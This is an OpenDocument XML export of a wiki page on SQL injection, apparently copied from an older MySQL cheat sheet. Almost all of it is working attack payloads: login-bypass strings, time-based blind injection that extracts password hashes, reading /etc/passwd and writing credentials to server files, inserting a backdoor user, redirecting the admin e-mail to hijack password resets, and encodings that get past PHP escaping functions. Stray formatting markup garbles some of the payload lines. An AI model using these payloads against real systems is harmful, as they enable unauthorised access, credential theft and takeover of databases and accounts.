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uridad:sql_injection"/><text:bookmark-start text:name="__RefHeading___sql_injection_1"/><text:bookmark-start text:name="sql_injection"/>SQL Injection<text:bookmark-end text:name="__RefHeading___sql_injection_1"/><text:bookmark-end text:name="sql_injection"/></text:h>
      <text:h text:style-name="Heading_20_4" text:outline-level="4"><text:bookmark-start text:name="__RefHeading___tecnicas_2"/><text:bookmark-start text:name="tecnicas"/>Técnicas<text:bookmark-end text:name="__RefHeading___tecnicas_2"/><text:bookmark-end text:name="tecnicas"/></text:h>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="LastListParagraph_List_20_1_Content_First"> /<text:span text:style-name="Strong_20_Emphasis">/
  * /*–*/
  * +
  * %09
  * %0A
  * %0D

&lt;note&gt;Extraido de 0x000000.com&lt;/note&gt;
1	SELECT * FROM login /* foobar */
2	SELECT * FROM login WHERE id = 1 or 1=1
3	SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE “%root%”

Use inside login form:
01	1' OR 1=1–
02	1' OR '1' = '1
03	'
04	''
05	'or“='
06	') or ('a'='a
07	”) or (“a”=“a
08	hi” or “a”=“a
09	or a=a–
10	admin'–
11	' or 0=0 –
12	” or 0=0 –
13	or 0=0 –
14	' or 'x'='x
15	“ or “x”=“x
16	') or ('x'='x
17	' or 1=1–
18	” or 1=1–
19	or 1=1–
20	' or a=a–
21	” or “a”=“a

Variations:
01	SELECT * FROM login WHE/</text:span>/RE id = 1 o/<text:span text:style-name="Strong_20_Emphasis">/r 1=1
02	 SELECT * FROM login WHE/</text:span>/RE id = 1 o/<text:span text:style-name="Strong_20_Emphasis">/r 1=1 A/</text:span>/ND user L/<text:span text:style-name="Strong_20_Emphasis">/IKE ”%root%“
03	 
04	 SHOW TABLES
05	 SELECT * FROM login WHERE id = 1 or 1=1 AND SHOW TABLES
06	 
07	 SELECT VERSION
08	 SELECT * FROM login WHERE id = 1 or 1=1 AND SELECT VERSION()
09	 
10	 SELECT host,user,db from mysql.db
11	 SELECT * FROM login WHERE id = 1 or 1=1 AND select host,user,db from mysql.db;

Blind injection vectors collection
Operators
1	SELECT 1 &amp;&amp; 1;
2	 SELECT 1 || 1;
3	 SELECT 1 XOR 0;

Evaluate
1	all render TRUE or 1.
2	 SELECT 0.1 ⇐ 2;
3	 SELECT 2 &gt;= 2;
4	 SELECT ISNULL(1/0);

Math
1	SELECT FLOOR(7 + (RAND() * 5));
2	 SELECT ROUND(23.298, -1);

Misc
1	SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
2	 SELECT MD5('abc');

Benchmark
01	SELECT BENCHMARK(10000000,ENCODE('abc','123'));
02	 (this takes around 5 sec on a localhost)
03	 
04	 SELECT BENCHMARK(1000000,MD5(CHAR(116)))
05	 (this takes around 7 sec on a localhost)
06	 
07	 SELECT BENCHMARK(10000000,MD5(CHAR(116)))
08	 (this takes around 70 sec on a localhost!)
09	 
10	 Using the timeout to check if user exists
11	 SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your browser!
Gathering info
Table mapping
1	SELECT COUNT(*) FROM tablename

Field mapping
1	SELECT * FROM tablename WHERE user LIKE ”%root%“
2	 SELECT * FROM tablename WHERE user LIKE ”%“
3	 SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
4	 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping
1	SELECT * FROM tablename WHERE email = 'user@site.com';
2	 SELECT * FROM tablename WHERE user LIKE ”%root%“
3	 SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors
Writing info into files.
1	SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)
1	SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
2	 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
3	 CHAR( 39))

Note: You must specify a new file, it may not exists and give the correct pathname.

The CHAR() quoteless function.
1	SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),
2	 CHAR(110),CHAR( 39))
3	 
4	 SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes
1	SELECT user FROM login WHERE user = 'root'
2	 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login

This evaluates the first char of the password hash from user 'root' which is 'a' (ASCII 97).

The hash is max 32 chars, and for every chars you'll need to execute the query with CHAR()

The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example.
01	SELECT user FROM login WHERE user = 'admin'
02	 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1
03	 
04	 1SELECT user FROM login WHERE user = 'admin'
05	 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5('x')),null) FROM login
06	 
07	 where: (passwordfield,startcharacter,selectlength)
08	 
09	 is like: (password,1,2) this selects: 'ab'
10	 is like: (password,1,3) this selects: 'abc'
11	 is like: (password,1,4) this selects: 'abcd'

A quoteless example:
1	SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
2	 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars
0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122
Misc.
Insert a new user into DB
1	INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user.
1	load data infile ”/etc/passwd“ INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp
1	SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”
1	UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions
Bypassing addslashes() with GBK HEX encoding.
1	WHERE x = 0xbf27 admin 0xbf27

Using an HEX encoded query to bypass escaping.
1	Normal: SELECT * FROM login WHERE user = 'root'
2	 Bypass: SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.
1	Normal: insert into login set user = 'root', pass = 'root'
2	 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determin the HEX value for injection.
1	SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.

With comments.
1	S/</text:span>/E/<text:span text:style-name="Strong_20_Emphasis">/L/</text:span>/E/<text:span text:style-name="Strong_20_Emphasis">/C/</text:span>/T * F/<text:span text:style-name="Strong_20_Emphasis">/R/</text:span>/O/<text:span text:style-name="Strong_20_Emphasis">/M l/</text:span>/o/<text:span text:style-name="Strong_20_Emphasis">/g/</text:span>/i/<text:span text:style-name="Strong_20_Emphasis">/n
2	 W/</text:span>/H/<text:span text:style-name="Strong_20_Emphasis">/E/</text:span>/R/<text:span text:style-name="Strong_20_Emphasis">/E u/</text:span>/s/<text:span text:style-name="Strong_20_Emphasis">/e/</text:span>/r = 0x726F6F74</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Bypassing mysql_real_escape_string() with BIG5 or GBK
1	“injection string” に関する追加情報：</text:p>
      <text:p text:style-name="Text_20_body">(MySQL 4.1.x before 4.1.20 and 5.0.x) </text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4"><text:bookmark-start text:name="__RefHeading___herramientas_3"/><text:bookmark-start text:name="herramientas"/>Herramientas<text:bookmark-end text:name="__RefHeading___herramientas_3"/><text:bookmark-end text:name="herramientas"/></text:h>
      <text:p text:style-name="Text_20_body">Havij → <text:a xlink:type="simple" xlink:href="http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/</text:a></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ha.ckers.org/sqlinjection/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://ha.ckers.org/sqlinjec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8::54:33</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2025-08-25T08::54:33</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>seguridad:sql_injection</dc:title>
  </office:meta>
</office:document-meta>
</file>